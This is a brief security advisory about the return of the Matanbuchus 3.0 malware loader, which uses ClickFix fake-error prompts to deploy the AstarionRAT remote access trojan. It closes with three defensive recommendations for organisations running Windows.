Matanbuchus 3.0 Malware Returns Using ClickFix Social Engineering to Deploy AstarionRAT

What happened

The Matanbuchus malware loader resurfaced in February 2026 with a fully rewritten version 3.0 that uses ClickFix social engineering to trick victims into manually executing malicious commands that initiate infection. Victims are presented with fake browser or software error prompts instructing them to run PowerShell or Run dialog commands, which silently install malware using msiexec without visible user interaction. Researchers at Huntress observed that the infection chain deploys a previously unseen remote access trojan called AstarionRAT, capable of credential theft, proxying traffic, and remote system control. The malware uses techniques such as DLL sideloading with legitimate antivirus binaries, renamed utilities like 7-Zip to extract payloads, and in-memory execution to evade forensic detection and maintain persistent access. 

Who is affected

Organizations and users running Microsoft Windows systems are affected if victims execute malicious commands prompted through ClickFix social engineering, allowing attackers to deploy the Matanbuchus loader and AstarionRAT remote access malware. 

Why CISOs should care

The campaign demonstrates how malware loaders increasingly rely on social engineering rather than software vulnerabilities, enabling attackers to bypass traditional defenses and establish persistent access within enterprise environments. 

3 practical actions

• Monitor for suspicious msiexec activity. Detect mixed-case msiexec execution and connections to newly registered domains. 
• Audit endpoint activity for unusual directories and persistence artifacts. Identify malware staging directories and DLL sideloading behavior. 
• Train users to avoid executing unsolicited commands. Prevent infections caused by ClickFix social engineering prompts.